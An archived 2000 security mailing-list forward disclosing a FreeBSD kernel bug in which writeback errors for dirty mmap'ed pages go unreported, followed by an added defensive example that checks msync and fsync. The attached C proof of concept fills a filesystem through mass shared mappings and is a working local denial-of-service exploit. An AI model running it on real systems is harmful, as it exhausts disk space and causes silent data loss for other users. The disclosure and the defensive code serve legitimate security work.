Subject: FreeBSDDEATH.c.txt (mmap dirty page no check bug) (fwd)
To: None <tech-security@netbsd.org>
From: Darren Reed <avalon@coombs.anu.edu.au>
List: tech-security
Date: 06/02/2000 23:07:21
From: Darren Reed <avalon@coombs.anu.edu.au>
Message-Id: <200006021307.XAA24697@cairo.anu.edu.au>
Subject: FreeBSDDEATH.c.txt (mmap dirty page no check bug) (fwd)
To: tech-security@netbsd.org
Date: Fri, 2 Jun 2000 23:07:21 +1000 (Australia/NSW)

I haven't checked this yet, forwarding first.

Forwarded message:
> From owner-freebsd-security@FreeBSD.ORG Fri Jun  2 23:03 EST 2000
> Delivered-To: freebsd-security@freebsd.org
> Date: Fri, 2 Jun 2000 14:09:06 +0100
> From: User Datagram Protocol <udp@closed-networks.com>
> To: freebsd-security@FreeBSD.ORG
> Subject: FreeBSDDEATH.c.txt (mmap dirty page no check bug)
> Message-ID: <20000602140906.I70438@closed-networks.com>
> Reply-To: User Datagram Protocol <udp@closed-networks.com>
> Organization: Closed Networks Limited, London, UK
> 
> 
> 
> Yo,
> 
> This seems to be doing the rounds with the script kiddies fairly quickly.
> I've attached it.
> (originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped
> by some skr1pt k1dd1es on irc)
> 
> vnode_pager_putpages() only does this check against the return value of
> VOP_PUTPAGES():
>         rtval = VOP_PUTPAGES(vp, m, bytes, sync, rtvals, 0);
>         if (rtval == EOPNOTSUPP) {
> 
> And vnode_pager_generic_putpages() appears to force the return value for
> all page writes that it does to VM_PAGER_OK even when an error occurs in
> VOP_WRITE().
> 
> The above is based on a quick inspection of the 4.0-STABLE fork source tree.
> So, this guy has a point.
> 
> Apologies if this issue was posted to any other lists, but it came my way,
> I am not currently on bugtraq due to some mail issues, and it looks like
> something we should be aware of (albeit really a quality of implementation
> issue that gets hit during times of high load - like something else I have
> in the pipeline. Heh.)
> 
> Regards
> -- 
> Bruce M. Simpson aka 'udp'       Security Analyst & UNIX Development Engineer
>                                             WWW: www.closed-networks.com/~udp 
> Dundee                                             www.packetfactory.net/~udp
> United Kingdom                            email:      udp@closed-networks.com
> 
> [attachment: FreeBSDDEATH.c.txt]
> 
> /*
> From: Oleg Derevenetz <Oleg.Derevenetz@p4.f3.n5025.z2.fidonet.org>
> Date: Wed, 31 May 2000 19:04:12 +0400
> Subject: mmap
> Message-ID: <959790285@p4.f3.n5025.z2.ftn>
> 
> Draft English translation: in vnode_pager.c there is no check at all for
> errors on the write of dirty mmap'ed pages to disk. If there is not enough
> space, or any other I/O error occurs, the results will be very bad.
> 
> It would be good to kill the calling process, but it is hard to find out
> the owner of the offending page.
> 
> (Original message, translated from Russian:)
> 
> The thing is that vnode_pager.c provides no error handling whatsoever for
> the flush of dirty mmap'ed file pages to disk when there is not enough
> space on the disk for the flush (or, for that matter, on any I/O error at
> all), and this leads to very bad results. About six months ago I
> corresponded with people from freebsd.hackers; by and large they simply
> brushed me off. The VM is done rather crookedly, so I have not yet
> managed to come up with a reaction to this problem. It would be
> desirable to kill the process, but extracting information about which
> process owns the page whose flush produced the error is quite difficult.
> So here I sit, racking my brains over what to do...
> 
> By the way, is anyone here working on the kernel VM?
> */
> 
> #include <sys/types.h>
> #include <sys/mman.h>
> #include <stdio.h>
> #include <string.h>
> #include <fcntl.h>
> #include <unistd.h>     /* lseek(), write() */
> #include <errno.h>
> 
> #define COUNT   1024*1024       /* number of files to create */
> #define SIZE    10*1024*1024    /* size of each file in bytes */
> 
> /*
>  * Create sparse 10 MB files in the current directory, map each one
>  * MAP_SHARED and dirty every page.  Nothing is unmapped or closed, so
>  * the kernel is left to write the dirty pages back on its own; once the
>  * filesystem runs out of space those writebacks fail, and the error is
>  * never reported to anyone.
>  */
> int main () {
>     int i,j,fd;
>     char *fptr, fname [16];
>     
>     for (i=0;i<COUNT;i++) {
>         sprintf (fname, "%d", i);
>         printf ("DEBUG: fname: %s\n", fname); fflush (stdout);
>         
>         /* mode is octal 0644 (the original used decimal 644) */
>         if ((fd=open (fname, O_RDWR|O_CREAT, 0644))<0) {
>             printf ("open() failed: %s\n", strerror (errno)); fflush (stdout);
>             return 0;
>         }
>         /* extend the file to SIZE+1 bytes without allocating blocks */
>         lseek (fd, SIZE, SEEK_SET);
>         write (fd, "-", 1);
>         printf ("DEBUG: write\n"); fflush (stdout);
>         
>         if ((fptr=mmap (NULL, SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd,
>                  0))==MAP_FAILED) {
>             printf ("mmap() failed: %s\n", strerror (errno)); fflush (stdout);
>             return 0;
>         }
>         printf ("DEBUG: mmap\n"); fflush (stdout);
>         
>         /* touch every byte so every page of the mapping becomes dirty */
>         for (j=0;j<SIZE;j++)
>             fptr[j]='o';
>         printf ("DEBUG: fill\n"); fflush (stdout);
>     }
>     
>     return 0;
> }
> 
> 
> 
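Added example, not part of the forwarded message or of any FreeBSD source: the userland side of the problem described above. A program that writes through a MAP_SHARED mapping has exactly two places where it can learn that the writeback failed: the return value of msync(MS_SYNC) and the return value of fsync() on the descriptor. The attached PoC checks neither, and neither does most software. This example dirties a mapping and then checks both, returning -errno of the first failing step. It assumes a POSIX system with mkstemp/mmap/msync and a writable /tmp; the file name template is constructed for the example. Caveat, per the analysis of vnode_pager_generic_putpages() above: on a kernel that forces every page write to VM_PAGER_OK, these calls can still report success after a failed flush, so this is the correct pattern for the application to follow, but it only helps once the kernel actually propagates the error.

```c
/* Added example: explicit writeback checking for a MAP_SHARED mapping.
 * Assumes POSIX mkstemp/ftruncate/mmap/msync/fsync and a writable /tmp. */
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Map a fresh temporary file of 'size' bytes, dirty every page, flush it
 * and report the first error.  Returns 0 on success or -errno of the first
 * failing step.  The file is unlinked immediately so nothing is left behind. */
int dirty_and_flush(size_t size)
{
    char path[] = "/tmp/mmapflush.XXXXXX";   /* constructed template */
    int rc = 0;
    int fd = mkstemp(path);
    if (fd < 0)
        return -errno;
    unlink(path);   /* the open descriptor keeps the inode alive until close */

    /* Give the file a real size; the PoC did this with lseek()+write(). */
    if (ftruncate(fd, (off_t)size) < 0) {
        rc = -errno;
        close(fd);
        return rc;
    }

    char *p = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (p == MAP_FAILED) {
        rc = -errno;
        close(fd);
        return rc;
    }

    memset(p, 'o', size);   /* dirty every page, like the PoC's fill loop */

    /* Check 1: push the dirty pages to the file and wait for completion.
     * ENOSPC/EIO from the flush surface here, if the kernel reports them. */
    if (msync(p, size, MS_SYNC) < 0)
        rc = -errno;

    if (munmap(p, size) < 0 && rc == 0)
        rc = -errno;

    /* Check 2: fsync() reports writeback errors deferred past msync(). */
    if (fsync(fd) < 0 && rc == 0)
        rc = -errno;

    if (close(fd) < 0 && rc == 0)
        rc = -errno;
    return rc;
}

int main(void)
{
    int rc = dirty_and_flush(4 * 1024 * 1024);
    if (rc != 0) {
        fprintf(stderr, "flush failed: %s\n", strerror(-rc));
        return 1;
    }
    puts("flush ok");
    return 0;
}
```

On a healthy filesystem both checks pass and the function returns 0; on a full or failing disk the first negative errno tells the caller which step failed, which is the information the kernel path quoted above throws away.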